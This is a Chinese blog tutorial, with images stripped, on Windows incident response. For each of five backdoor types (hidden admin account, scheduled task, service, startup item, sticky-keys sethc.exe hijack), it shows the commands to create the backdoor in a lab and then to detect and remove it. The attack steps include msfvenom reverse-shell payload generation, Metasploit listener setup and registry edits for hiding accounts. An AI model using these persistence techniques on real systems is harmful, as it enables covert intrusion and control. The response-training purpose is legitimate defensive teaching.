0
点赞
收藏
分享

微信扫一扫

[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置(后门账户\计划任务后门\服务后门\启动项后门\粘贴键后门)

文章目录

1.1 Windows后门应急-1:windows后门账户

1.1.1 隐藏账户介绍

1.1.1.1 简介
1.1.1.2 原理
1.1.1.3 实现步骤
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -o malicious.exe
$NewUser = "HiddenUser"
$NewUserPassword = ConvertTo-SecureString "StrongPassword123!" -AsPlainText -Force
New-LocalUser -Name $NewUser -Password $NewUserPassword -AccountNeverExpires -UserMayNotChangePassword -PasswordNeverExpires
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Name "HiddenUser" -Value 0
Get-LocalUser | Select-Object Name, Enabled
1.1.1.4 防御措施
Get-LocalUser

1.1.2 隐藏账户创建实战

1.1.2.1 前提条件
1.1.2.2 环境介绍
1.1.2.3 创建一个隐藏账号
net user powershell$ w123456! /add 
net localgroup administrators powershell$ /add 

在这里插入图片描述

net user 

在这里插入图片描述

1.1.2.4 隐藏不彻底
1.1.2.4.1 管理账户查看

在这里插入图片描述

1.1.2.4.2 管理工具查看

在这里插入图片描述

1.1.2.4.3 注销登录页面查看

在这里插入图片描述

1.1.2.5 修改注册表
1.1.2.5.1 首先打开注册表编辑器
regedit

在这里插入图片描述

1.1.2.5.2 确保可以看到SAM路径下的文件

在这里插入图片描述

在这里插入图片描述

1.1.2.5.3 找到用户对应的表

在这里插入图片描述

在这里插入图片描述

1.1.2.5.4 替换F值

在这里插入图片描述

在这里插入图片描述

1.1.2.5.5 导出需隐藏用户的表

在这里插入图片描述

在这里插入图片描述

1.1.2.5.6 删除需要隐藏的用户
net user powershell$ /del

在这里插入图片描述

在这里插入图片描述

1.1.2.5.7 导入需隐藏用户的表

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

1.1.2.5.8 隐藏状态

在这里插入图片描述

在这里插入图片描述

1.1.2.6 登陆界面隐藏账户
regedit

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

1.1.2.7 用户被完全隐藏

在这里插入图片描述

1.1.2.8用户正常登录

在这里插入图片描述

在这里插入图片描述

1.1.3 隐藏账户应急实战

1.1.3.1 注册表中用户

在这里插入图片描述

1.1.3.2 管理账户中用户
1.1.3.3 管理工具中用户

在这里插入图片描述

1.1.3.4 删除隐藏账户

1.2 Windows后门应急-2:计划任务后门

1.2.1 计划任务后门介绍

1.2.1.1 简介
1.2.1.2 原理
1.2.1.3 实现步骤
1.2.1.4 防御措施

1.2.2 计划任务后门创建实战

1.2.2.1 前提条件
1.2.2.2 环境介绍
1.2.2.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe 

在这里插入图片描述

1.2.2.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run

在这里插入图片描述

1.2.2.5 将创建的后门上传到目标windows机器
python -m http.server 80

在这里插入图片描述

在这里插入图片描述

1.2.2.6 创建计划任务后门
schtasks /create /tn PowerShell /sc minute /mo 1 /tr C:\PowerShell.exe /ru system /f

在这里插入图片描述

schtasks /query /tn "PowerShell" /fo LIST /v

在这里插入图片描述

control schedtasks

在这里插入图片描述

1.2.2.7 windows10权限丢失

在这里插入图片描述

1.2.3 计划任务后门应急实战

1.2.3.1 查看网络连接
netstat -ano

在这里插入图片描述

在这里插入图片描述

1.2.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 764

在这里插入图片描述

C:\PowerShell.exe  PowerShell.exe    420

在这里插入图片描述

1.2.3.3 应急处置
C:\PowerShell.exe
taskkill /f /pid 764

在这里插入图片描述

1.2.3.4 计划任务分析
control schedtasks

在这里插入图片描述

1.2.3.5 删除计划任务
schtasks /delete /tn "PowerShell" /f

在这里插入图片描述

在这里插入图片描述

1.3 Windows后门应急-3:windows服务后门

1.3.1 windows服务后门介绍

1.3.1.1 简介
1.3.1.2 原理
1.3.1.3 实现步骤
1.3.1.4 防御措施

1.3.2 windows服务后门创建实战

1.3.2.1 前提条件
1.3.2.2 环境介绍
1.3.2.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe 

在这里插入图片描述

1.3.2.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run

在这里插入图片描述

1.3.2.5 将创建的后门上传到目标windows机器
python -m http.server 80

在这里插入图片描述

在这里插入图片描述

1.3.2.6 创建后门自启动服务
sc create "PowerShellserver" binpath= "C:\PowerShell.exe"
sc description "PowerShellserver" "PowerShellserver"
sc config "PowerShellserver" start= auto
net start "PowerShellserver"

在这里插入图片描述

1.3.2.7 windows10权限丢失

1.3.3 windows服务后门应急实战

1.3.3.1 查看网络连接
netstat -ano

在这里插入图片描述

1.3.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 6352

在这里插入图片描述

C:\PowerShell.exe                                         PowerShell.exe                   420

经检测发现C:\PowerShell.exe文件为后门木马

在这里插入图片描述

1.3.3.3 应急处置
C:\PowerShell.exe
taskkill /f /pid 420

在这里插入图片描述

1.3.3.4 启动项分析

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

1.3.3.5 完全处置

在这里插入图片描述

在这里插入图片描述

1.4 Windows后门应急-4:启动项后门

1.4.1 启动项后门介绍

1.4.1.1 简介
1.4.1.2 原理
1.4.1.3 实现步骤
1.4.1.4 防御措施
1.4.1.5 应用场景

1.4.2 启动项后门创建实战

1.4.2.1 启动项后门演示
1.4.2.1.1 前提条件
1.4.2.1.2 环境介绍
1.4.2.1.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe 

在这里插入图片描述

1.4.2.1.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run

在这里插入图片描述

1.4.2.1.5 将后门放在 Windows启动项
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup

在这里插入图片描述

1.4.2.1.6 重启 windows

在这里插入图片描述

1.4.2.1.7 windows10权限丢失

在这里插入图片描述

1.4.3 启动项后门后门应急实战

1.4.3.1 查看网络连接
netstat -ano
1.4.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 7456

在这里插入图片描述

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wxiaoge.exe PowerShell.exe
1.4.3.3 应急处置
c:\programdata\microsoft\windows\start menu\programs\startup\PowerShell.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\PowerShell.exe
taskkill /f /pid 2920
1.4.3.4 注意事项
https://blog.csdn.net/qq_51577576/article/details/130119164

1.5 Windows后门应急-5:shift粘贴键后门

1.5.1 shift粘贴键后门介绍

1.5.1.1 简介
1.5.1.2 原理
1.5.1.3 实现步骤
1.5.1.4 防御措施
1.5.1.5 应用场景

1.5.2 shift粘贴键后门创建实战

1.5.2.1 shift粘贴键演示

在这里插入图片描述

1.5.2.2 shift粘贴键演示执行文件位置
C:\Windows\System32\sethc.exe

在这里插入图片描述

1.5.2.3 sethc.exe映像劫持创建后门
1.5.2.3.1 简单介绍
1.5.2.3.2 实现步骤
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
C:\Windows\System32\cmd.exe

在这里插入图片描述

1.5.2.3.2 后门创建成功

在这里插入图片描述

在这里插入图片描述

1.5.3 shift粘贴键后门应急实战

1.5.3.1 上传分析工具
https://blog.csdn.net/qq_51577576/article/details/130119164

在这里插入图片描述

1.5.3.2 分析找到源头
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion\Image File ExecutionOption

在这里插入图片描述

在这里插入图片描述

1.5.3.3 应急处置

在这里插入图片描述

1.5.3.4 应急处置成功

在这里插入图片描述

相关资源

[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-1:windows后门账户
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-2:计划任务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-3:windows服务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-4:启动项后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-5:Shift 粘贴键后门

举报

相关推荐

0 条评论